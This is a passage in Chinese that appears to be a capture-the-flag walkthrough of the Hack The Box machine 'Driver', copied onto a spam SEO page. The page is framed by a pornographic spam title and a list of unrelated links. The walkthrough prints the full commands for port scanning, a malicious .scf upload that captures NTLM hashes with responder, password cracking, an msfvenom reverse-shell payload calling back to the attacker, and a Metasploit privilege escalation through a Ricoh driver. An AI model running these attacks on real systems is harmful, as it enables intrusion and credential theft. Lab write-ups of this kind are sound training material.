中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

衡水網(wǎng)站網(wǎng)站建設(shè)成都最好的網(wǎng)站推廣優(yōu)化公司

衡水網(wǎng)站網(wǎng)站建設(shè),成都最好的網(wǎng)站推廣優(yōu)化公司,深圳公司注冊材料,網(wǎng)站后綴gov目錄 連接至HTB服務(wù)器并啟動靶機(jī) 信息收集 使用rustscan對靶機(jī)TCP端口進(jìn)行開放掃描 將靶機(jī)TCP開放端口號提取并保存 使用nmap對靶機(jī)TCP開放端口進(jìn)行腳本、服務(wù)掃描 使用nmap對靶機(jī)TCP開放端口進(jìn)行漏洞、系統(tǒng)掃描 使用nmap對靶機(jī)常用UDP端口進(jìn)行開放掃描 使用smbclient嘗…

目錄

連接至HTB服務(wù)器并啟動靶機(jī)

信息收集

使用rustscan對靶機(jī)TCP端口進(jìn)行開放掃描

將靶機(jī)TCP開放端口號提取并保存

使用nmap對靶機(jī)TCP開放端口進(jìn)行腳本、服務(wù)掃描

使用nmap對靶機(jī)TCP開放端口進(jìn)行漏洞、系統(tǒng)掃描

使用nmap對靶機(jī)常用UDP端口進(jìn)行開放掃描

使用smbclient嘗試root用戶空密碼登錄靶機(jī)SMB服務(wù)

邊界突破

使用瀏覽器訪問靶機(jī)80端口

使用Yakit抓取請求包

仿照該憑證格式,使用字典嘗試爆破密碼

使用上述憑證通過該頁面認(rèn)證后進(jìn)入面板

嘗試上傳.scf文件利用SMB反射獲取用戶憑證

使用responder開始欺騙及監(jiān)聽客戶端

將該哈希值寫入文件以便爆破

使用john對該哈希文件進(jìn)行字典爆破

使用evil-winrm通過上述憑證登錄靶機(jī)Win-RM服務(wù)

權(quán)限提升

查看靶機(jī)C盤根目錄

查看靶機(jī)系統(tǒng)內(nèi)用戶

查看當(dāng)前用戶賬戶信息

查看當(dāng)前用戶權(quán)限信息

查看當(dāng)前用戶PS歷史記錄

查找該驅(qū)動所在目錄路徑

?使用大模型搜索該驅(qū)動是否存在提權(quán)漏洞

使用searchsploit搜索該漏洞

使用msfvenom生成Payload

將該P(yáng)ayload上傳至靶機(jī)中

啟動Metasploit

檢索該漏洞模塊


連接至HTB服務(wù)器并啟動靶機(jī)

靶機(jī)IP:10.10.11.106

分配IP:10.10.16.13


信息收集

使用rustscan對靶機(jī)TCP端口進(jìn)行開放掃描

rustscan -a 10.10.11.106 -r 1-65535 --ulimit 5000 | tee res

將靶機(jī)TCP開放端口號提取并保存
ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,??????? ?
80,135,445,5985
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# echo $ports
80,135,445,5985

使用nmap對靶機(jī)TCP開放端口進(jìn)行腳本、服務(wù)掃描

nmap -sT -p$ports -sCV -Pn 10.10.11.106

  • 需要重點(diǎn)關(guān)注的端口和服務(wù)

80端口:IIS服務(wù)

445端口:SMB服務(wù)

5985端口:Win-RM服務(wù)

使用nmap對靶機(jī)TCP開放端口進(jìn)行漏洞、系統(tǒng)掃描
nmap -sT -p$ports --script=vuln -O -Pn 10.10.11.106

使用nmap對靶機(jī)常用UDP端口進(jìn)行開放掃描
nmap -sU --top-ports 20 -Pn 10.10.11.106

使用smbclient嘗試root用戶空密碼登錄靶機(jī)SMB服務(wù)

smbclient -L \\10.10.11.106

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# smbclient -L \\10.10.11.106
Password for [WORKGROUP\root]:
session setup failed: NT_STATUS_ACCESS_DENIED


邊界突破

使用瀏覽器訪問靶機(jī)80端口

  • 提示需要用戶名和密碼

使用Yakit抓取請求包
  • 其中,請求頭中的Authorization參數(shù)用于發(fā)送憑證

  • 對Basic后的字符串進(jìn)行解碼

仿照該憑證格式,使用字典嘗試爆破密碼

Authorization: Basic YWRtaW46YWRtaW4=

  • Base64解碼后

賬戶:admin

密碼:admin

  • 將靶機(jī)IP與主域名進(jìn)行綁定使DNS從本地解析
sed -i '1i 10.10.11.106 driver.htb' /etc/hosts

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# sed -i '1i 10.10.11.106 driver.htb' /etc/hosts
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?
┌──(root?kali)-[/home/kali/Desktop/temp]
└─# head -n1 /etc/hosts????????????????????????? ?
10.10.11.106 driver.htb

使用上述憑證通過該頁面認(rèn)證后進(jìn)入面板
  • 這里不知道為啥加載出來是這樣的,反正也是轉(zhuǎn)了半天

  • 點(diǎn)擊左上角的Firmware Updates進(jìn)入固件更新頁,該頁允許文件上傳

  • 該頁面中存在描述:Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.

翻譯:選擇打印機(jī)型號并將相應(yīng)的固件更新上傳到我們的文件共享。我們的測試團(tuán)隊(duì)將手動審查上傳并盡快啟動測試。

  • 因此,從這里上傳的所有文件應(yīng)當(dāng)都會保存在靶機(jī)SMB服務(wù)器中,換句話說通過該頁面我們擁有了向靶機(jī)SMB服務(wù)器寫入文件的權(quán)限

嘗試上傳.scf文件利用SMB反射獲取用戶憑證

基于SCF文件的SMB中繼攻擊:攻擊者上傳精心構(gòu)造的惡意.scf文件到SMB服務(wù)器共享目錄,用戶瀏覽該目錄時(shí),系統(tǒng)自動解析.scf文件觸發(fā)向惡意服務(wù)器的訪問請求,進(jìn)而以用戶身份發(fā)送NTLMv2認(rèn)證請求,攻擊者截獲并獲取該用戶的NTLMv2憑證 。

  • 構(gòu)造一個(gè)惡意的.scf文件
[Shell]    
Command=2    
IconFile=\\10.10.16.13\test
使用responder開始欺騙及監(jiān)聽客戶端
responder -wv -I tun0
  • 選擇文件后,點(diǎn)擊Submit開始上傳

  • 攻擊機(jī)responder收到回顯

  • tony用戶哈希值
tony::DRIVER:cc7a5be9edf57e2b:B00C7598710E1FEB3662800CB261B7F3:0101000000000000009AE12B6165DB0140FB9FA2F3FF07460000000002000800420050005000370001001E00570049004E002D004100530034003900330053004C004C0046004300390004003400570049004E002D004100530034003900330053004C004C004600430039002E0042005000500037002E004C004F00430041004C000300140042005000500037002E004C004F00430041004C000500140042005000500037002E004C004F00430041004C0007000800009AE12B6165DB010600040002000000080030003000000000000000000000000020000092420DE18E3028DCAC604904C0367CAEF10C3B61D875F7E0ADB1D86EE62E88D90A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003300000000000000000000000000
將該哈希值寫入文件以便爆破
echo 'tony::DRIVER:cc7a5be9edf57e2b:B00C7598710E1FEB3662800CB261B7F3:0101000000000000009AE12B6165DB0140FB9FA2F3FF07460000000002000800420050005000370001001E00570049004E002D004100530034003900330053004C004C0046004300390004003400570049004E002D004100530034003900330053004C004C004600430039002E0042005000500037002E004C004F00430041004C000300140042005000500037002E004C004F00430041004C000500140042005000500037002E004C004F00430041004C0007000800009AE12B6165DB010600040002000000080030003000000000000000000000000020000092420DE18E3028DCAC604904C0367CAEF10C3B61D875F7E0ADB1D86EE62E88D90A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0031003300000000000000000000000000' > hash
使用john對該哈希文件進(jìn)行字典爆破
john hash --wordlist=../dictionary/rockyou.txt

賬戶:tony

密碼:liltony

使用evil-winrm通過上述憑證登錄靶機(jī)Win-RM服務(wù)

evil-winrm -i 10.10.11.106 -u 'tony' -p 'liltony'

  • 在C:\Users\tony\Desktop目錄下找到user.txt文件


權(quán)限提升

查看靶機(jī)C盤根目錄

  • 可見存在兩個(gè)Program Files目錄,因此靶機(jī)系統(tǒng)大概率為64位系統(tǒng)

查看靶機(jī)系統(tǒng)內(nèi)用戶

net user

  • 靶機(jī)系統(tǒng)內(nèi)普通權(quán)限用戶僅有該用戶
查看當(dāng)前用戶賬戶信息
net user tony

  • 該用戶沒有加入特殊權(quán)限組
查看當(dāng)前用戶權(quán)限信息
whoami /priv

  • 沒有可利用的特權(quán)
查看當(dāng)前用戶PS歷史記錄
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

*Evil-WinRM* PS C:\Users\tony\Desktop> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'

ping 1.1.1.1
ping 1.1.1.1

  • Powershell歷史記錄中第一條命令整體功能為,向系統(tǒng)添加一個(gè)打印機(jī),其中驅(qū)動完整名稱:`RICOH PCL6 UniversalDriver V4.23`
查找該驅(qū)動所在目錄路徑
cmd /c dir /s /ad "RICOH PCL6 UniversalDriver V4.23"

  • 該驅(qū)動所在位置:C:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23
?使用大模型搜索該驅(qū)動是否存在提權(quán)漏洞

使用searchsploit搜索該漏洞
searchsploit --cve 2019-19363

  • 由輸出可見,該漏洞集成于MSF中

使用msfvenom生成Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.13 LPORT=1425 -f exe > shell.exe

┌──(root?kali)-[/home/kali/Desktop/temp]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.13 LPORT=1425 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes

將該P(yáng)ayload上傳至靶機(jī)中
upload shell.exe

啟動Metasploit
msfconsole
  • 切換到監(jiān)聽模塊
use exploit/multi/handler
  • 配置好選項(xiàng):LHOST、LPORT、PAYLOAD,并開始監(jiān)聽

msf6 exploit(multi/handler) > set LHOST 10.10.16.13
LHOST => 10.10.16.13
msf6 exploit(multi/handler) > set LPORT 1425
LPORT => 1425
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.13:1425

  • 控制靶機(jī)運(yùn)行Payload
.\shell.exe
  • 攻擊機(jī)MSF監(jiān)聽端收到回顯

[*] Started reverse TCP handler on 10.10.16.13:1425
[*] Sending stage (203846 bytes) to 10.10.11.106
[*] Meterpreter session 1 opened (10.10.16.13:1425 -> 10.10.11.106:49431) at 2025-01-13 04:44:35 -0500

meterpreter >

  • 列出靶機(jī)系統(tǒng)進(jìn)程
ps

  • 通過Session欄目判斷,為0則是系統(tǒng)進(jìn)程,為1則是用戶進(jìn)程。我嘗試將Meterpreter遷移進(jìn)用戶進(jìn)程explorer.exe
migrate -N explorer.exe

meterpreter > migrate -N explorer.exe
[*] Migrating from 4256 to 3260...
[*] Migration completed successfully.

檢索該漏洞模塊
search 2019-19363

  • 切換到該模塊
use exploit/windows/local/ricoh_driver_privesc
  • 列出該模塊所需填寫的選項(xiàng)
show options

  • 此處需要配置好的選項(xiàng):LHOST、LPORT、PAYLOAD、SESSION

msf6 exploit(windows/local/ricoh_driver_privesc) > set LHOST 10.10.16.13
LHOST => 10.10.16.13
msf6 exploit(windows/local/ricoh_driver_privesc) > set LPORT 1426
LPORT => 1426
msf6 exploit(windows/local/ricoh_driver_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ricoh_driver_privesc) > set SESSION 1
SESSION => 1

  • 執(zhí)行該模塊
exploit

  • 查找root.txt文件位置
search -f root.txt

meterpreter > search -f root.txt
Found 1 result...
=================

Path???????????????????????????????????? Size (bytes)? Modified (UTC)
----???????????????????????????????????? ------------? --------------
c:\Users\Administrator\Desktop\root.txt? 34??????????? 2025-01-13 05:55:59 -0500

  • 查看root.txt文件內(nèi)容

meterpreter > shell
Process 1876 created.
Channel 2 created.
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
030cd5d04a90f1bd3c163e0bcd3280eb

http://www.risenshineclean.com/news/53877.html

相關(guān)文章:

  • 仿做靜態(tài)網(wǎng)站多少錢seo網(wǎng)址超級外鏈工具
  • 游戲網(wǎng)站如何做濰坊seo計(jì)費(fèi)
  • 怎樣優(yōu)化手機(jī)網(wǎng)站愛采購seo
  • 吳江城鄉(xiāng)建設(shè)局網(wǎng)站搜索引擎優(yōu)化特點(diǎn)
  • 新鄉(xiāng)網(wǎng)站建設(shè)那家好友情鏈接是什么
  • 營銷型網(wǎng)站建設(shè)申請域名時(shí)公司類型的域名后綴一般是廣州今日頭條新聞
  • 凡科做網(wǎng)站有什么用軟文代寫費(fèi)用
  • wordpress qq聯(lián)系代碼app優(yōu)化排名
  • 網(wǎng)站后臺統(tǒng)計(jì)代碼福州網(wǎng)站seo公司
  • 專做藥材的網(wǎng)站有哪些東莞優(yōu)化網(wǎng)站關(guān)鍵詞優(yōu)化
  • 網(wǎng)站開發(fā)算前端嗎合肥網(wǎng)站建設(shè)
  • 網(wǎng)站建設(shè)項(xiàng)目經(jīng)理考題怎么seo網(wǎng)站關(guān)鍵詞優(yōu)化
  • 網(wǎng)站排名易下拉教程app推廣在哪里可以接單
  • 東莞美食網(wǎng)站建設(shè)報(bào)價(jià)承德網(wǎng)絡(luò)推廣
  • 網(wǎng)站建設(shè)截圖中國女排聯(lián)賽排名
  • 商贏網(wǎng)站建設(shè)百度注冊
  • 免費(fèi)自制主題app滕州seo
  • 用護(hù)衛(wèi)神做共享網(wǎng)站優(yōu)化課程設(shè)置
  • 建設(shè)網(wǎng)站個(gè)人簡介范文短視頻入口seo
  • 網(wǎng)站目錄管理系統(tǒng)模板aso搜索排名優(yōu)化
  • 電子商務(wù)網(wǎng)站的建設(shè)收益seo做的比較牛的公司
  • 網(wǎng)站建設(shè)尺寸金華網(wǎng)站推廣
  • 如何讓網(wǎng)站被百度收入如何優(yōu)化網(wǎng)站快速排名
  • 學(xué)院網(wǎng)站建設(shè) 需求分析百度自己的宣傳廣告
  • 高端網(wǎng)站優(yōu)化公司專業(yè)制作網(wǎng)站的公司哪家好
  • 金寨縣建設(shè)規(guī)劃局網(wǎng)站企業(yè)管理軟件排名
  • 云建設(shè)平臺seo快速排名外包
  • 純div css做網(wǎng)站簡潔版商丘seo排名
  • 網(wǎng)站建設(shè)nuoweb什么是搜索引擎推廣
  • wordpress獲取文章id方法手機(jī)網(wǎng)站怎么優(yōu)化關(guān)鍵詞